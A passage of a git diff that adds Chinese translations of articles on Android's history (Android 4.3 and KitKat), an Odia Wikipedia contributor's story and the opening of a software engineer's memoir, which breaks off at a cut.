+![新谷歌地图轻量化了许多,在一屏内能够显示更多的信息。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/newmaps21.png)
+新谷歌地图轻量化了许多,在一屏内能够显示更多的信息。
+Ron Amadeo 供图
+
+左边的图片显示的是点击了搜索栏后的效果(带键盘,这里关闭了)。过去谷歌在空搜索栏下面显示一个空页面,但在地图中,谷歌利用这些空间链接到新的“本地”页面。搜索结果页显示一般信息的结果,比如餐馆,加油站,以及景点。在结果页的底部是个列表,显示你的搜索历史和手动缓存部分地图的选项。
+
+右侧图片显示的是地点页面。上面地图 7.0 的截图里显示的地图不是略缩图,它是完整的地图视图。在新版的谷歌地图中,地点作为卡片浮动显示在主地图之上,地图重新居中显示该地点。向上滑动可以让卡片覆盖地图,向下滑动可以显示带有底部一小条结果的完整地图。如果该地点是搜索结果列表中的一个,左右滑动可以在结果之间切换。
+
+地点页面重新设计以显示更有用的信息概览。在第一页,新版添加了重要信息,比如地图上的位置,点评得分,以及点评数目。因为这是个手机,所以软件内可以直接拨打电话,电话号码的显示被认为是毫无意义的,被去掉了。旧版地点显示到那里的距离,新版谷歌地图显示到那里的时间,基于交通状况和偏好的交通方式——一个更加实用的衡量方式。新版还在中间放了个分享按钮,这使得通过即时通讯或短信协调的时候更加方便。
+
+### Android 4.3,果冻豆——早早支持可穿戴设备 ###
+
+如果谷歌没有在安卓 4.3 和安卓 4.2 之间通过 Play 商店发布更新的话,安卓 4.3 会是个不可思议的更新。如果新版 Play 商店,Gmail,地图,书籍,音乐,Hangouts 环聊,以及 Play Games 打包作为新版安卓的一部分,它将会作为有史以来最大的发布受到欢呼。虽然谷歌没必要延后新功能的发布。有了 Play 服务框架,只剩很少的部分需要系统更新,2013 年 7 月底谷歌发布了看似无关紧要的“安卓 4.3”。
+
+![安卓 4.3 通知访问权限界面的可穿戴设备选项。
+](http://cdn.arstechnica.net/wp-content/uploads/2014/03/2014-03-28-12.231.jpg)
+安卓 4.3 通知访问权限界面的可穿戴设备选项。
+Ron Amadeo 供图
+
+谷歌也毫无疑问地认为 4.3 的重要性不高,将新版也叫做“果冻豆”(第三个叫果冻豆的版本了)。安卓 4.3 的新功能列表像是谷歌无法通过 Play 商店或谷歌 Play 服务更新的部分的细目清单,大部分包含了为开发者作出的底层架构改动。
+
+但许多新增功能似乎只为了一个目的——安卓 4.3 是谷歌对可穿戴计算支持的特洛伊木马。4.3 加入了低功耗蓝牙支持,使用很少的能耗将安卓和其它设备连接到一起并传输数据——可穿戴设备的必要特性。安卓 4.3 还添加了“通知访问权限”API,允许应用完全复制和控制通知面板。应用可以显示通知文本以及和用户操作一样地和通知交互——也就是点击操作按钮和消除通知。当你有个通知面板时从本机应用做这个操作没什么意义,但是在一个独立于你手机的设备上,复制通知面板的消息就显得很有用了。为数不多的接入的应用是 “Android Wear Preview(安卓可穿戴预览)”,使用了通知 API 驱动大部分的 Android Wear 界面。
+
+“4.3 是给可穿戴设备准备的”这个理论解释了 4.3 相对较少的新特性:它的推出是为了给 OEM 厂商时间去升级设备,为 [Android Wear][2] 的发布做准备。这个计划看起来起作用了。Android Wear 要求 安卓 4.3 及以上版本,安卓 4.3 已经发布很长时间了,大部分主要的旗舰设备都已经升级了。
+
+安卓并没有那么激动人心,但安卓从现在起的新版也不需要那么激动人心了。一切都变得那么模块化了,谷歌可以通过 Google Play 在它们完成时随时推送更新,不用再作为一个大系统更新来更新这么多组件。
+
+----------
+
+![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
+
+[Ron Amadeo][a] / Ron是Ars Technica的评论编缉,专注于安卓系统和谷歌产品。他总是在追寻新鲜事物,还喜欢拆解事物看看它们到底是怎么运作的。
+
+[@RonAmadeo][t]
+
+--------------------------------------------------------------------------------
+
+via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/24/
+
+译者:[alim0x](https://github.com/alim0x) 校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
+
+[1]:http://live.arstechnica.com/liveblog-google-io-2013-keynote/
+[2]:http://arstechnica.com/gadgets/2014/03/in-depth-with-android-wear-googles-quantum-leap-of-a-smartwatch-os/
+[a]:http://arstechnica.com/author/ronamadeo
+[t]:https://twitter.com/RonAmadeo
diff --git a/translated/talk/The history of Android/25 - The history of Android.md b/translated/talk/The history of Android/25 - The history of Android.md
new file mode 100644
index 0000000000..01b93c71a9
--- /dev/null
+++ b/translated/talk/The history of Android/25 - The history of Android.md
@@ -0,0 +1,71 @@
+安卓编年史
+================================================================================
+![LG 制造的 Nexus 5,奇巧(KitKat)的首发设备。
+](http://cdn.arstechnica.net/wp-content/uploads/2014/03/nexus56.jpg)
+LG 制造的 Nexus 5,奇巧(KitKat)的首发设备。
+
+Android 4.4,奇巧——更完美;更少的内存占用
+
+谷歌安卓 4.4 的发布确实很讨巧。谷歌和[雀巢公司合作][1],新版系统的代号是“奇巧(KitKat)”,并且它是在 2013 年 10 月 31 日发布的,也就是万圣节。雀巢公司推出了限量版带安卓机器人的奇巧巧克力,它的包装也帮助新版系统推广,消费者有机会赢取一台 Nexus 7。
+
+一部新的 Nexus 设备也随奇巧一同发布,就是 Nexus 5。新旗舰拥有迄今最大的显示屏:一块五英寸,1920x1080 分辨率的 LCD 显示屏。除了更大尺寸的屏幕,LG——Nexus 5 的制造商——还将 Nexus 5 的机器大小控制得和 Galaxy Nexus 或 Nexus 4 差不多。
+
+Nexus 5 相对同时期的高端手机配置算是标准了,拥有 2.3Ghz 骁龙 800 处理器和 2GB 内存。手机再次在 Play 商店销售无锁版,相同配置的大多数手机价格都在 600 到 700 美元之间,但 Nexus 5 的售价仅为 350 美元。
+
+奇巧最重要的改进之一你并不能看到:显著减少的内存占用。对奇巧而言,谷歌齐心协力开始了降低系统和预装应用内存占用的努力,称作“Project Svelte”。经过了无数的优化工作和通过一个“低内存模式”(禁用图形开销大的特效),安卓现在可以在 340MB 内存下运行。低内存需求是件了不起的事,因为在发展中国家的设备——智能手机增长最快的市场——许多设备的内存仅有 512MB。冰淇淋三明治更高级的 UI 显著提高了对安卓设备的系统配置要求,这使得很多低端设备——甚至是新发布的低端设备——的安卓版本停留在姜饼。奇巧更低的配置需求意味着这些廉价设备能够跟上脚步。有了奇巧,谷歌希望完全消灭姜饼(写下本文时姜饼的市场占有率还在 20% 左右)。为了防止更低的系统需求还不够有效,甚至有报道称谷歌将[不再授权][2]谷歌应用给姜饼设备。
+
+除了给低端设备带来更现代版本的系统,Project Svelte 更低的内存需求同样对可穿戴设备也是个好消息。Google Glass [宣布][3]它会切换到这个更精简的系统,[Android Wear][4] 同样也运行在奇巧之上。安卓 4.4 带来的更低的内存需求以及 4.3 中的通知消息 API 和低功耗蓝牙支持给了可穿戴计算漂亮的支持。
+
+奇巧的亮点还有无数精心打磨过的核心系统界面,它们无法通过 Play 商店升级。系统界面,拨号盘,时钟还有设置都能看到升级。
+
+![奇巧在 Google Now 启动器下的透明系统栏。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/1homescreenz.png)
+奇巧在 Google Now 启动器下的透明系统栏。
+Ron Amadeo 供图
+
+奇巧不仅去掉了讨人厌的锁屏左右屏的线框——它还默认完全禁用了锁屏小部件!谷歌明显感觉到了多屏锁屏和锁屏主屏对新用户来说有点复杂,所以锁屏小部件现在需要从设置里启用。锁屏和时钟里不平衡的时间字体换成了一个对称的字重,看起来好看多了。
+
+在奇巧中,应用拥有将系统栏和状态栏透明的能力,显著地改变了系统的外观。系统栏和状态栏现在混合到壁纸和启用透明栏的应用中去了。这些栏还能通过新功能“沉浸”模式完全被应用隐藏。
+
+奇巧是“电子”科幻风格棺材上的最后一颗钉子,几乎完全移除了系统的蓝色痕迹。状态栏图标由蓝色变成中性的白色。主屏的状态栏和系统栏并不是完全透明的;它们有深色的渐变,这样在使用浅色壁纸的时候白色的图标还能轻易地识别出来。
+
+![Google Now 和文件夹的调整。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/nowfolders.png)
+Google Now 和文件夹的调整。
+Ron Amadeo 供图
+
+在 Nexus 5 上随奇巧到来的主屏实际上由 Nexus 5 独占了几个月,但现在任何 Nexus 设备都能拥有它了。新的主屏叫做“Google Now Launcher”,它实际上是[谷歌搜索应用][5]。是的,谷歌搜索从一个简单的搜索框成长到了整个主屏幕,并且在奇巧中,它涉及了壁纸,图标,应用抽屉,小部件,主屏设置,Google Now,当然,还有搜索框。由于搜索现在运行在整个主屏幕,任何时候只要打开了主屏并且屏幕是点亮的,就可以通过说“OK Google”激活语音命令。在搜索栏有引导用户说出“OK Google”的文本,在几次使用后这个介绍会隐去。
+
+Google Now 的集成度现在更高了。除了通常的系统栏上滑激活,Google Now 还占据了最左侧的主屏。新版还引入了一些设计上的调整。谷歌的 logo 移到了搜索栏内,整个顶部区域更紧凑了。显示更多卡片的设计被去除了,新添加的一组底部按钮指向备忘录,自定义选项,以及一个更多操作按钮,里面由设置,反馈,以及帮助。因为 Google Now 是主屏幕的一部分,所以它也拥有透明 的系统栏和状态栏。
+
+透明以及让系统的特定部分“更明亮”是奇巧的设计主题。黑色调通过透明化从状态栏和系统栏移除了,文件夹的黑色背景也换为了白色。
+
+![新的,更加干净的应用列表,以及完整的应用阵容。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/apps.png)
+新的,更加清爽的应用列表,以及完整的应用阵容。
+Ron Amadeo 供图
+
+奇巧的图标阵容相对 4.3 有显著的变化。更戏剧化地说,这是一场大屠杀,谷歌从 4.3 的配置中移除了七个图标。谷歌 Hangouts 现在能够处理短信,所以信息应用被去除了。Hangouts 同时还接手了 Google Messenger 的职责,所以它的图标也不见了。Google Currents 不再作为默认应用预装,因为它不久后就会被终结——和它一起的还有 Google Play Magazines(Play 杂志),取代它们的是 Google Play Newsstand(Play 报刊亭)。谷歌地图被打回一个图标,这意味着本地和导航的快捷方式被去掉了。难以理解的 Movie Studio 也被去除了——谷歌肯定已经意识到了没人想在手机上剪辑电影。有了主屏的“OK Google”关键词检测,语音搜索图标的呈现就显得多余了,因而将其移除。令人沮丧的是,没人用的新闻和天气应用还在。
+
+有个新应用“Photos(相片)”——实际上是 Google+ 的一部分——接手了图片管理的工作。在 Nexus 5 上,相册和 Google+ 相片十分相似,但在 Google Play 版设备上更新版的奇巧中,相册已经完全被 Google+ 相片所取代。Play Games 是谷歌的后端多用户游戏服务——谷歌版的 Xbox Live 或苹果的 Game Center。Google Drive,已经在 Play 商店存在数年的应用,终于成为了内置应用。谷歌 2012 年 6 月收购的 Quickoffice 也进入了内置应用阵容。Drive 可以打开 Google 文档,Quickoffice 可以打开微软 Office 文档。如果细细追究起来,在大多数奇巧中包含了两个文档编辑应用和两个相片编辑应用。
+
+----------
+
+![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
+
+[Ron Amadeo][a] / Ron是Ars Technica的评论编缉,专注于安卓系统和谷歌产品。他总是在追寻新鲜事物,还喜欢拆解事物看看它们到底是怎么运作的。
+
+[@RonAmadeo][t]
+
+--------------------------------------------------------------------------------
+
+via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/25/
+
+译者:[alim0x](https://github.com/alim0x) 校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
+
+[1]:http://arstechnica.com/gadgets/2013/09/official-the-next-edition-of-android-is-kitkat-version-4-4/
+[2]:http://www.androidpolice.com/2014/02/10/rumor-google-to-begin-forcing-oems-to-certify-android-devices-with-a-recent-os-version-if-they-want-google-apps/
+[3]:http://www.androidpolice.com/2014/03/01/glass-xe14-delayed-until-its-ready-promises-big-changes-and-a-move-to-kitkat/
+[4]:http://arstechnica.com/gadgets/2014/03/in-depth-with-android-wear-googles-quantum-leap-of-a-smartwatch-os/
+[5]:http://arstechnica.com/gadgets/2013/11/google-just-pulled-a-facebook-home-kitkats-primary-interface-is-google-search/
+[a]:http://arstechnica.com/author/ronamadeo
+[t]:https://twitter.com/RonAmadeo
diff --git a/translated/talk/The history of Android/26 - The history of Android.md b/translated/talk/The history of Android/26 - The history of Android.md
new file mode 100644
index 0000000000..2abd7a9a70
--- /dev/null
+++ b/translated/talk/The history of Android/26 - The history of Android.md
@@ -0,0 +1,87 @@
+安卓编年史
+================================================================================
+![新的“添加到主屏幕”界面无疑受到了蜂巢的启发。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/homesetupthrowback.png)
+新的“添加到主屏幕”界面无疑受到了蜂巢的启发。
+Ron Amadeo 供图
+
+奇巧的主屏幕配置界面漂亮地对蜂巢进行了复古。在有巨大的 10 英寸屏幕的蜂巢平板上(上方右侧图片),长按主屏背景会向你展现一个所有主屏幕的缩放视图。可以从下面的小部件抽屉里将它们拖放到任意主屏上——这很方便。在将蜂巢的界面带到手机上时,从安卓 4.0 直到 4.3,谷歌都跳过了这个设计,把它留给了大屏幕设备,在手机上长按后只显示一个选项列表(中间的图片)。
+
+但在奇巧上,谷歌最终给出了解决方案。在长按后,4.4 呈现一个略微缩放的视图——你可以看到当前主屏以及它左右侧的屏幕。点击“小部件”按钮会打开一个小部件略缩图的完整列表,但是长按一个小部件后,你会回到缩放视图,并且你可以在主屏页面之间滚动,将图标放在你想要的位置。将图标或者小部件拖动过最右侧的主屏页面,你可以创建一个新的主屏页面。
+
+![联系人和去掉所有蓝色痕迹的键盘。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/RIP33B5E5.png)
+联系人和去掉所有蓝色痕迹的键盘。
+Ron Amadeo 供图
+
+奇巧是电子风格设计的完结。在系统的大多数部分,剩下的蓝色高亮都被换成了灰色。在联系人应用中,头部和联系人列表字母分割线的蓝色都移除掉了。图片的位置换了一侧,底栏变成了浅灰色以和顶部相称。几乎将蓝色渗透进每个应用的键盘,现在是灰底灰色灰高亮。这可不是件坏事。应用应该允许有它们自己的配色方案——在键盘上强迫存在潜在的颜色冲突可不是个好设计。
+
+![前三张是奇巧的拨号盘,最后一张是 4.3 的。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/phone.png)
+前三张是奇巧的拨号盘,最后一张是 4.3 的。
+Ron Amadeo 供图
+
+谷歌完全重制了奇巧中的拨号,创造了一个疯狂的设计,改变了用户对手机的思考方式。实际上新版拨号中的数字都被尽可能地隐藏了——在首屏上甚至没有拨号盘。打电话的主要界面现在是个搜索栏!如果你想给你的联系人打电话,只要在搜索栏输入他的名字;如果你想给一个公司打电话,只要输入公司的名字,拨号会通过谷歌地图庞大的数据库找到号码。它工作得令人难以置信的好,这是只有谷歌才能完成的事情。
+
+如果搜索不是你的菜的话,应用还会智能地显示通话记录列表,最常联系人,还有指向所有联系人的链接。底部的链接指向你的通话记录,传统的拨号盘,以及常规的更多操作按钮,包含一个设置页面。
+
+![Office 相关:新的内置应用 Google Drive,以及打印支持。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/googledrive-and-printing.png)
+Office 相关:新的内置应用 Google Drive,以及打印支持。
+Ron Amadeo 供图
+
+在奇巧中 Google Drive 终于作为内置应用包含了进来,令人惊奇的是这居然用了这么长时间。Drive 允许用户创建和编辑 Google Docs 表格和文档,用相机扫描文档并作为 PDF 上传,或者查看(不能编辑)演示文稿。Drive 的设计十分现代,侧面拥有滑出式导航抽屉,并且是 Google Now 风格卡片式设计。
+
+为了有更多的移动办公乐趣,奇巧包含了系统级打印框架。在设置的底部有“打印”设置界面,任何打印机 OEM 厂商都可以为它写个插件。谷歌云打印自然是首批支持者之一。只要你的打印机和云打印相连接,无论是本地或通过一台装有 Chrome 浏览器的电脑,你都可以借助网络进行打印。应用同样也需要支持打印框架。点击 Google Drive 里的“i”按钮会显示文档信息,并且给你打印的选项。就像桌面系统那样,会弹出一个设置对话框,有打印份数,纸张尺寸,以及页面选择等选项。
+
+![Google+ 应用的“相片”部分,它取代了相册。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/that-is-one-dead-gallery.png)
+Google+ 应用的“相片”部分,它取代了相册。
+Ron Amadeo 供图
+
+Google+ 相片和相册最初都在 Nexus 5 上随附,但在 Google Play 设备稍晚版本的奇巧上,相册被砍掉了,Google+ 完全接手了相片管理。新应用的主题从深色变成了浅色,Google+ 相片还带来了现代的导航抽屉设计。
+
+安卓一直以来都有即时上传功能,它会自动备份所有图片到谷歌的云存储,开始是 Picasa 后来是 Google+。G+ 相片相比相册最大的好处是它可以管理那些云端存储的图片。图片右下角的云图标指示备份状态,它会从右到左地填满来指示正在上传。G+ 相片带来了它自己的照片编辑器,还有许多其它的 Google+ 图片功能,比如高亮,自动美化,当然,还有分享到 Google+。
+
+![时钟应用的调整,添加了一个闹钟页面并修改了时间输入框。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/clocks.png)
+时钟应用的调整,添加了一个闹钟页面并修改了时间输入框。
+Ron Amadeo 供图
+
+谷歌将 4.2 引入的优秀时间选择器换成了一个奇怪的时钟界面,操作起来比旧界面更慢了也更不精确了。首先是个可以选择小时的单指针时钟,然后显示的是另一个选择分钟的单指针时钟。选择的时候要转动分针或点击数字,这让用用户很难选择不是整五分钟的时间增量。不像之前的时间选择器需要选择一个时间段,这里默认时间段是 AM(重复一下,这样设置的时候容易不小心偏差 12 小时)。
+
+### 今日安卓无处不在 ###
+
+![](http://cdn.arstechnica.net/wp-content/uploads/2014/05/android-everywhere2.png)
+图片来自 Google/Sony/Motorola/Ron Amadeo
+
+一开始从一家搜索引擎公司的古怪的黑莓复制品,一步一步到如今科技界巨头之一在世界上最流行的系统。安卓已经成为谷歌的实际消费者操作系统,它驱动着手机,平板,Google Glass,Google TV,甚至更多。[它的一部分][1]甚至还用到了 Chromecast 中。在未来,谷歌还会将 [Android Wear][2] 带到手表和可穿戴设备上,[开放汽车联盟][3] 要将安卓带到汽车上。不久后会谷歌再次承诺对客厅的计划,带上 [Android TV][4]。这个系统对谷歌是如此重要的支柱,原本应该覆盖全公司产品的大会活动,比如 Google I/O,俨然成为了安卓发布派对。
+
+![上排:谷歌 Play 内容商店。下排:谷歌 Play 应用。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/2014-03-30-03.08.jpg)
+上排:谷歌 Play 内容商店。下排:谷歌 Play 应用。
+Ron Amadeo 供图
+
+移动产业曾经的的丑小鸭脱胎换骨,它的用户界面还[赢得了设计奖项][5]。像 Google Now 一样的设计风格影响了整个公司的产品,甚至连像搜索,Google+,Youtube,以及地图这样的桌面站点都加入了卡片式设计中。设计也在不断地演进。谷歌下一步[统一设计][6]的计划不仅是面对安卓,也包括了所有的产品。谷歌的目标是让你不管在安卓,还是桌面浏览器,或是一个手表上,使用像 Gmail 这样的服务时都能有一样的体验。
+
+谷歌将很多安卓的组件转移到 Play 商店,这样版本发布就越来越不重要了。谷歌决定了解决运营商和 OEM 厂商更新问题的最佳途径,就是完全绕开这些绊脚石。从这里开始,在一个安卓更新里除了核心底层变动外就没什么内容了——但是更多的 API 被加入了谷歌 Play 服务。如果你只看版本更新的话,相对安卓高峰期 2.5 个月的发布周期来说开发已经放缓了。但实际情况是谷歌现在可以持续将改进推送到 Play 商店,从周期发布变成了永无止境,有些微妙的更新流。
+
+每天 150 万台设备激活,安卓除了增长就是增长。在未来,安卓会是手机和平板到汽车和手表的领军者,奇巧更低的系统配置要求也会让发展中国家的手机价格更低。结果呢?越来越多的人会来到线上。对那里的大多数人来说,安卓不止是他们的手机,也是他们首要的计算设备。随着安卓为谷歌领导掌管众多领域,从一个小收购而来的系统逐渐成长为了谷歌最重要的产品。
+
+----------
+
+![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
+
+[Ron Amadeo][a] / Ron是Ars Technica的评论编缉,专注于安卓系统和谷歌产品。他总是在追寻新鲜事物,还喜欢拆解事物看看它们到底是怎么运作的。
+
+[@RonAmadeo][t]
+
+--------------------------------------------------------------------------------
+
+via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/26/
+
+译者:[alim0x](https://github.com/alim0x) 校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
+
+[1]:http://blog.gtvhacker.com/2013/chromecast-exploiting-the-newest-device-by-google/
+[2]:http://arstechnica.com/gadgets/2014/03/in-depth-with-android-wear-googles-quantum-leap-of-a-smartwatch-os/
+[3]:http://arstechnica.com/information-technology/2014/01/open-automotive-alliance-aims-to-bring-android-inside-the-car/
+[4]:http://arstechnica.com/gadgets/2014/04/documents-point-to-android-tv-googles-latest-bid-for-the-living-room/
+[5]:http://userexperienceawards.com/uxa2012/
+[6]:http://arstechnica.com/gadgets/2014/04/googles-next-design-challenge-unify-app-design-across-platforms/
+[a]:http://arstechnica.com/author/ronamadeo
+[t]:https://twitter.com/RonAmadeo
diff --git a/translated/talk/my-open-source-story/20160415 A four year, action-packed experience with Wikipedia.md b/translated/talk/my-open-source-story/20160415 A four year, action-packed experience with Wikipedia.md
new file mode 100644
index 0000000000..b2be6a7a01
--- /dev/null
+++ b/translated/talk/my-open-source-story/20160415 A four year, action-packed experience with Wikipedia.md
@@ -0,0 +1,74 @@
+在维基激动人心的四年
+=======================================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/wikipedia_checkuser_lead.jpg?itok=4lVDjSSM)
+
+
+我自认为自己是个奥迪亚的维基人。我通过写文章和纠正错误的文章贡献[奥迪亚][1]知识(在印度的[奥里萨邦][2]的主要的语言 )给很多维基项目,像维基百科和维基文库,我也为用印地语和英语写的维基文章做贡献。
+
+![](https://opensource.com/sites/default/files/resize/1st_day_at_odia_wikipedia_workshop_image_source_facebook-200x133.jpg)
+
+我对维基的爱从我第 10 次考试(像在美国的 10 年级学生的年级考试)之后看到的英文维基文章[孟加拉解放战争][3]开始。一不小心我打开了印度维基文章的链接,,并且开始阅读它. 在文章左边有用奥迪亚语写的东西, 所以我点击了一下, 打开了一篇在奥迪亚维基上的 [????/Bhārat][4] 文章. 发现了用母语写的维基让我很激动!
+
+![](https://opensource.com/sites/default/files/resize/introducing_wikipedia_at_google_io_image_by_gdg_bhubaneswar-251x166.png)
+
+一个邀请读者参加 2014 年 4 月 1 日第二次布巴内斯瓦尔的研讨会的标语引起了我的好奇。我过去从来没有为维基做过贡献, 只用它搜索过, 我并不熟悉开源和社区贡献流程。加上,我只有 15 岁。我注册了。在研讨会上有很多语言爱好者,我是中间最年轻的一个。尽管我害怕我父亲还是鼓励我去参与。他起了非常重要的作用—他不是一个维基媒体人,和我不一样,但是他的鼓励给了我改变奥迪亚维基的动力和参加社区活动的勇气。
+
+我相信奥迪亚语言和文学需要改进很多错误的想法和知识缺口所以,我帮助组织关于奥迪亚维基的活动和和研讨会,我完成了如下列表:
+
+* 发起3次主要的 edit-a-thons 在奥迪亚维基:2015 年妇女节,2016年妇女节, abd [Nabakalebara edit-a-thon 2015][5]
+* 在全印度发起了征集[檀车节][6]图片的比赛
+* 在谷歌的两大事件([谷歌I/O大会扩展][7]和谷歌开发节)中代表奥迪亚维基
+* 在2015[Perception][8]和第一次[Open Access India][9]会议
+
+![](https://opensource.com/sites/default/files/resize/bengali_wikipedia_10th_anniversary_cc-by-sa4.0_biswaroop_ganguly-251x166.jpg)
+
+我只编辑维基项目到了去年,在 2015 年一月,当我出席[孟加拉语维基百科的十周年会议][10]和[毗瑟挐][11]活动时,[互联网和社会中心][12]主任,邀请我参加[培训培训师][13] 计划。我的灵感始于扩展奥迪亚维基,为[华丽][14]的活动举办的聚会和培训新的维基人。这些经验告诉我作为一个贡献者该如何为社区工作。
+
+[Ravi][15],在当时维基的主任,在我的旅程也发挥了重要作用。他非常相信我让我参与到了[Wiki Loves Food][16],维基共享中的公共摄影比赛,组织方是[2016 印度维基会议][17]。在2015的 Loves Food 活动期间,我的团队在维基共享中加入了 10,000+ 有 CC BY-SA 协议的图片。Ravi 进一步巩固了我的承诺,和我分享很多关于维基媒体运动的信息,和他自己在 [奥迪亚维基百科13周年][18]的经历。
+
+不到一年后,在 2015 年十二月,我成为了网络与社会中心的[获取知识的程序][19]的项目助理( CIS-A2K 运动)。我自豪的时刻之一是在普里的研讨会,我们从印度带了 20 个新的维基人来编辑奥迪亚维基媒体社区。现在,我的指导者在一个普里非正式聚会被叫作[WikiTungi][20]。我和这个小组一起工作,把 wikiquotes 变成一个真实的计划项目。在奥迪亚维基我也致力于缩小性别差距。[八个女编辑][21]也正帮助组织聚会和研讨会,参加 [Women's History month edit-a-thon][22]。
+
+在我四年短暂而令人激动的旅行之中,我也参与到 [维基百科的教育项目][23],[通讯团队][24],两个全球的 edit-a-thons: [Art and Feminsim][25] 和 [Menu Challenge][26]。我期待着更多的到来!
+
+我还要感谢 [Sameer][27] 和 [Anna][28](都是之前维基百科教育计划的成员)。
+
+------------------------------------------------------------------------------
+
+via: https://opensource.com/life/16/4/my-open-source-story-sailesh-patnaik
+
+作者:[Sailesh Patnaik][a]
+译者:[译者ID](https://github.com/hkurj)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://opensource.com/users/saileshpat
+[1]: https://en.wikipedia.org/wiki/Odia_language
+[2]: https://en.wikipedia.org/wiki/Odisha
+[3]: https://en.wikipedia.org/wiki/Bangladesh_Liberation_War
+[4]: https://or.wikipedia.org/s/d2
+[5]: https://or.wikipedia.org/s/toq
+[6]: https://commons.wikimedia.org/wiki/Commons:The_Rathyatra_Challenge
+[7]: http://cis-india.org/openness/blog-old/odia-wikipedia-meets-google-developer-group
+[8]: http://perception.cetb.in/events/odia-wikipedia-event/
+[9]: https://opencon2015kolkata.sched.org/speaker/sailesh.patnaik007
+[10]: https://meta.wikimedia.org/wiki/Bengali_Wikipedia_10th_Anniversary_Celebration_Kolkata
+[11]: https://www.facebook.com/vishnu.vardhan.50746?fref=ts
+[12]: http://cis-india.org/
+[13]: https://meta.wikimedia.org/wiki/CIS-A2K/Events/Train_the_Trainer_Program/2015
+[14]: https://en.wikipedia.org/wiki/Wikipedia:GLAM
+[15]: https://www.facebook.com/ravidreams?fref=ts
+[16]: https://commons.wikimedia.org/wiki/Commons:Wiki_Loves_Food
+[17]: https://meta.wikimedia.org/wiki/WikiConference_India_2016
+[18]: https://or.wikipedia.org/s/sml
+[19]: https://meta.wikimedia.org/wiki/CIS-A2K
+[20]: https://or.wikipedia.org/s/xgx
+[21]: https://or.wikipedia.org/s/ysg
+[22]: https://or.wikipedia.org/s/ynj
+[23]: https://outreach.wikimedia.org/wiki/Education
+[24]: https://outreach.wikimedia.org/wiki/Talk:Education/News#Call_for_volunteers
+[25]: https://en.wikipedia.org/wiki/User_talk:Saileshpat#Barnstar_for_Art_.26_Feminism_Challenge
+[26]: https://opensource.com/life/15/11/tasty-translations-the-open-source-way
+[27]: https://www.facebook.com/samirsharbaty?fref=ts
+[28]: https://www.facebook.com/anna.koval.737?fref=ts
diff --git a/translated/talk/my-open-source-story/20160429 Why and how I became a software engineer.md b/translated/talk/my-open-source-story/20160429 Why and how I became a software engineer.md
new file mode 100644
index 0000000000..2e024c33bf
--- /dev/null
+++ b/translated/talk/my-open-source-story/20160429 Why and how I became a software engineer.md
@@ -0,0 +1,101 @@
+我成为一名软件工程师的原因和经历
+==========================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/myopensourcestory.png?itok=6TXlAkFi)
+
+1989 年乌干达首都,坎帕拉。
+
+赞美我的父母,他们机智的把我送到叔叔的办公室,去学着用电脑,而非将我留在家里添麻烦。几日后,我和另外六、七个小孩,还有一台放置在与讲台相垂直课桌子上的崭新电脑,一起置身于 21 层楼高的狭小房间中。很明显我们还不够格去碰那家伙。在长达三周无趣的 DOS 命令学习后,终于迎来了这美妙的时光。终于轮到我来输 **copy doc.txt d:** 了。
+
+那奇怪的声音其实是将一个简单文件写入五英寸软盘的声音,但听起来却像音乐般美妙。那段时间,这块软盘简直成为了我的至宝。我把所有我可以拷贝的东西都放在上面了。然而,1989 年的乌干达,人们的生活十分正经,相较而言捣鼓电脑,拷贝文件还有格式化磁盘就称不上正经。我不得不专注于自己的学业,这让我离开了计算机科学走入了建筑工程学。
+
+在这些年里,我和同龄人一样,干过很多份工作也学到了许多技能。我教过幼儿园的小朋友,也教过大人如何使用软件,在服装店工作过,还在教堂中担任过付费招待。在我获取堪萨斯大学的学位时,我正在技术高管的手下做技术助理,其实也就听上去比较洋气,也就是搞搞学生数据库而已。
+
+当我 2007 年毕业时,这些技术已经变得不可或缺。建筑工程学的方方面面都与计算机科学深深的交织在一起,所以我们也都在不经意间也都学了些简单的编程知识。我对于这方面一直很着迷。但由于我不得不成为一位正经的工程师,所以我发展了一项私人爱好:写科幻小说。
+
+在我的故事中,我以我笔下的女英雄的形式存在。她们都是编程能力出众的科学家,总是在冒险的途中用自己的技术发明战胜那些渣渣们,有时发明要在战斗中进行。我想出的这些“新技术”,一般基于真实世界中的发明。也有些是从买来的科幻小说中读到的。这就意味着我需要了解这些技术的原理,而且我的研究使我有意无意的关注了许多有趣的 subreddit 和电子杂志
+
+### 开源:巨大的宝库
+
